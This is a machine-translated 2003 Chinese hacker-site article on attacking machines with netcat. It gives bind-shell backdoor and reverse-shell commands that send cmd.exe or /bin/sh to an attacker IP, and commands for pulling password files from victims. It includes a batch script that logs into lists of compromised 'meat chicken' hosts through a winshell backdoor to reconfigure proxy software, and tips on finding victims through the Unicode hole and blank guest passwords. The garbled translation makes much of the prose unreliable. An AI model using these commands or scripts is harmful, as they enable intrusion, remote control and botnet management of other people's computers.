The nc.exe high-level skill application compiles |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>classical material>>nc.exe high-level 
                  skill application compiles  Printing

            The nc.exe high-level skill application compiles
            Www.cshu.net  2003-4-12  fog rain village 

              The nc.exe high-level skill application compiles 
              The nc.exe high-level skill application compiles
              Article author: Zhoutree 
              0. writes in the front speech
              1. Netcat 1.10 for NT - nc11nt.zip, primitive English information
              2. Netcat 1.10 for NT help information
              3. Netcat 1.10 commonly used formses of field orders
              4. management meats chicken, change meat chicken establishment
              5. downloading connections
              After 6. records
              ######################################################################
              0. writes in the front speech
              ######################################################################
              Recently worked quite idle, always was thinking how automatic 
              telnet meat chicken, automatically did execute the order. Manages 
              own meat chicken.
              Own write a procedure. The foundation of basic skills is 
              insufficient, therefore only has looks at nc the help information, 
              although only looked at partly to understand,
              But with the aid of to Jinshan word tyrant 2,002 editions, or has 
              understood a thing
              I sense has the necessity to summarize again Mainly is in any case 
              meets I needs
              ######################################################################
              1. Netcat 1.10 for NT - nc11nt.zip
              ######################################################################
              Basic Features
              * Outbound or inbound connections, TCP or UDP, to or from any 
ports
              * Full DNS forward/reverse checking, with appropriate warnings
              * Ability to use any local source port
              * Ability to use any locally-configured network source address
              * Built-in port-scanning capabilities, with randomizer
              * Can read command line arguments from standard inputb
              * Slow-send mode, one line every N seconds
              * Hex dump of transmitted and received data
              * Ability to let another program service established
              Connections
              * Telnet-options responder
              New for NT
              * Ability to run in the background without a console window
              * Ability to restart as a single-threaded server to handle a new
              Connection
              ________________________________________________________________________
              Some of the features of netcat are: 
              Outbound or inbound connections, TCP or UDP, to or from any ports 
              Full DNS forward/reverse checking, with appropriate warnings 
              Ability to use any local source port 
              Ability to use any locally-configured network source address 
              Built-in port-scanning capabilities, with randomizer 
              Built-in loose source-routing capability 
              Can read command line arguments from standard input 
              Slow-send mode, one line every N seconds 
              Optional ability to let another program service inbound 
              connections 
              Some of the potential uses of netcat: 
              Script backends 
              Scanning ports and inventorying services 
              Backup handlers 
              File transfers 
              Server testing and simulation 
              Firewall testing 
              Proxy gatewaying 
              Network performance testing 
              Address spoofing tests 
              Protecting X servers 
              1,001 other uses you`ll likely come up with 
              Netcat + Encryption = Cryptcat
              Contrasts win2000 Microsoft telnet.exe and Microsoft's tlntsvr.exe 
              service, connection time was allowed to see
              1.1 NC.EXE is a non- standard telnet customer end procedure,
              1.2 also has a putty.exe customer end procedure, provides four 
              kind of connections patterns
              -raw -telnet -rlogin -ssh.
              ######################################################################
              2. Netcat 1.10 for NT help information
              ######################################################################
              C:\WINDOWS\Desktop>nc -h
              [ v1.10 NT ]
              Connect to somewhere: Nc [ -options ] hostname port [ s ] [ ports 
              ]...
              Listen for inbound: Nc -l -p port [ options ] [ hostname ] [ port 
]
              Options:
              -d detach from console, background mode (backstage pattern)
              -e prog inbound program to exec [ dangerous! ! ]
              -g gateway source-routing hop point [ s ], up to 8
              -G num source-routing pointer: 4, 8, 12...
              -h this cruft (this help information)
              -i secs delay interval for lines sent, ports scanned (delay time)
              -l listen mode, for inbound connects (monitor pattern, waiting 
              connection)
              -L listen harder, after re-listen on socket close (connection 
              closure, still continued to monitor)
              -n numeric-only IP addresses, no DNS (ip pattern of digit, non- 
              dns analysis)
              -o file hex dump of traffic (hexadecimal system pattern output 
              document, three sections) 
              -p port local port number (local port)
              -r randomize local and remote ports (stochastic local 
              long-distance port)
              -s addr local source address (local source address)
              -t answer TELNET negotiation
              -u UDP mode
              -v verbose [ use twice to be more verbose ] (-vv more information)
              -w secs timeout for connects and final net reads
              -z zero-I/O mode [ used for scanning ] (scanning pattern, -vv)
              Port numbers can be individual or ranges: M-n [ inclusive ]
              ######################################################################
              3. Netcat 1.10 commonly used formses of field orders
              ######################################################################
              Under quotes "Deep sleep Does not awake in October on 15 Before 
              dawn" the article part.
              3.1. Port prying:
              Nc -vv ip port
              RIVER [ 192.168.0.198 ] 19,190 (?) Open // demonstrated whether 
              opens open
              3.2. Scanner
              Nc -vv -w 5 ip port-port port
              Nc -vv -z ip port-port port
              Like this scans can leave behind the massive traces, the system 
              manager meets extra is careful
              3.3. back doors
              Victim machine: // victim's machine
              Nc -l -p port -e cmd.exe //win2000
              Nc -l -p port -e /bin/sh //unix, linux
              Attacker machine: // aggressor's machine
              Nc ip -p port // connects victim_IP, then obtains shell.

              3.4. Reverse connection
              Attacker machine: // generally is sql2.exe, long-distance 
              overflow, webdavx3.exe attack
              // or wollf reverse connection
              Nc -vv -l -p port 
              Victim machine:
              Nc -e cmd.exe attacker ip -p port
              Nc -e /bin/sh attacker ip -p port
              Or:
              Attacker machine:
              Nc -vv -l -p port1 /* uses in to input */
              Nc -vv -l -p prot2 /* uses in to demonstrate */
              Victim machine:
              Nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
              Nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
              139 must add parameter -s (nc.exe -L -p 139 -d -e cmd.exe -s 
              opposite party machine IP)
              Like this may guarantee nc.exe first to NETBIOS. 

              3.5. Transmission document:
              3.5.1 attacker machine <-- victim machine // tows the 
              cryptographic document from the meat chicken to come back
              Nc -d -l -p port < path\filedest /*attacker machine*/ may the 
              shell execution
              Nc -vv attacker_ip port > path\file.txt /*victim machine*/ needs 
              the Ctrl+C withdrawal
              // meat chicken needs inside gui contact surface cmd.exe to carry 
              out (terminal to land, was inferior to installs the FTP 
              convenience) Otherwise does not have the means to input Crl+C.
              3.5.2 attacker machine --> victim machine on // passes on the 
              order document to the meat chicken
              Nc - vv -l -p port > path\file.txt /*victim machine*/ needs the 
              Ctrl+C withdrawal
              Nc -d victim_ip port < path\filedest /*attacker machine*/ may the 
              shell execution
              // like this quite is good We land the terminal Invades other meat 
              chickens May choose the shell pattern to land
              Conclusion: May transmit ascii, the bin document May transmit the 
              procedure document
              Question: After connects some ip, after the transmission 
              completes, needs to transmit Ctrl+C to withdraw from nc.exe.
              Or only the once more connection to use pskill.exe to massacre the 
              advancement But whether released transmits the sentence handle 
              which the document opened?

              3.6 ports data grasp the package
              Nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15
              < 00000058353030205379 6e 74617820657272 6f 72 # 500 Syntax error
              < 00.000068 million 2c 2,063 6f 6d 6d 61 6e 642.022222075 billion 
              6e 72 #, command "" unr
              < 000.000786563 billion 6f 67 6e 69 7a 6,564 2e 0d 0a # 
              ecognized...
              < 0000008483000001 8f #.....

              3.7 telnet, automatic batch run. * * * * * I want the key 
              recommendation the thing am this
              Nc victim_ip port < path\file.cmd /*victim machine*/ demonstration 
              implementation
              Nc -vv victim_ip port < path\file.cmd /*victim machine*/ 
              demonstration implementation
              Nc -d victim_ip port < path\file.cmd peaceful pattern
              _______________file.cmd________________________
              Password
              Cd %windir%
              Echo [ ] = [ %windir% ]
              C:
              Cd \
              Md test
              Cd /d %windir%\system32\
              Net stop sksockserver
              Snake.exe -config port 11,111
              Net start sksockserver
              Exit
              _______________file.cmd__END___________________
              ######################################################################
              4. management meats chicken, change meat chicken establishment
              ######################################################################
              4.1 for instance must unify above the change meat chicken's proxy 
              port snake.exe revision for 11,111 to serve name "sksockserver"
              Uses the winshell back door Port 1,234 passwords password
              The forms of field orders is
              Modi.bat youip.txt
              ___________modi.bat____________________________
              @if "%1" == "" echo Error: No ip.txt &&goto END
              :start
              @echo password >a.cmd
              @echo s >>a.cmd
              @echo cd /d %%windir%%\system32\ >>a.cmd
              @net stop "sksockserver" >>a.cmd
              @snake.exe -config port 11,111 >>a.cmd
              @net start "sksockserver" >>a.cmd
              @exit >>a.cmd
              :auto
              @for /f "eol=; Tokens=1,2 "%%i in (%1) do @ (nc.exe -vv -w 3 %%i 
              1,234 < a.cmd)
              :END
              ___________modi.bat__END_______________________

              4.2
              @echo off
              Color f0
              :start
              Cls
              C:\nc -vv -w 3 -l -p 80>>80.txt
              Goto start
              Will switch off later the firewall to move this batch run, will be 
              able to monitor to many surveys the U loophole the information, 
              mostly
              Is a three group -- &#22958; mho reaches the virus to scan you. Like this 
              can obtain the meat chicken Although the quality is not high
              But also is one cheap means
              Meat chicken characteristic:
              1. Unicode loophole
              2. The guest password is spatial, administrators group users
              3. Other loopholes
              Own slowly crisply go. But, emphasized once more, does not suggest 
              moreover not to be able to destroy the domestic main engine, will 
              come up later changes name tftp.exe. Then does the mmc.exe 
              advancement with pskill, is afterwards &#26432;Ը. Completes after the 
              back door, stops using the guest account number, copes with the 
              fool scanner
              ######################################################################
              5. downloading connections
              ######################################################################
              5.1 http://www.atstake.com/research/tools/network_utilities/
              Tool: Netcat 1.10 for Unix 
              Version: 03.20.96 
              Platforms: *nix
              Tool: Netcat 1.1 for Win 95/98/NT/2000 
              Version: 02.08.98 
              Platforms: Runs on Win 95/98/NT/2000 

              5.2 http://www.xfocus.net/download.php? Id=320 
              Name: Cryptcat_nt.zip renewal time: 2002-04-05 
              Category: Network tool platform: Win9x/NT/2000 size: 115.8K 
              submits: Maxilaw 
              Synopsis: Encryption transmission nc. 
              5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/ 
              overseas website
              10.03.02 15:48 1,305 cryptcat.txt
              10.03.02 15:48 245,760 cryptcat_linux2.tar
              10.03.02 15:48 118,533 cryptcat_nt.zip

              ######################################################################
              After 6. records
              ######################################################################
              Will only have tomorrow to access the net, looks for win2000 
              server to land the terminal to serve tests.
              I or broken win98, does not have the means yo
              Tries, thought, is possible you to be allowed to use it to be more 
              matters you to be allowed to see also in nc110.tgz under script 
              table of contents that
              A script, obtains some mentalities. 
              Here does not have nc110.tgz to compress the package. Will go to 
              google.com to search tomorrow.
              Under the Unix order or is not familiar 



              Original author: . 
              Origin: . 
              Altogether has 190 readers to read this article 

              [Tells friend] 
            Previous article:"The Norton network security special police officer 
            2,003" the Chinese edition lands China 

            Next article:Microsoft for will block Linux to announce the partial 
            Windows source code 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
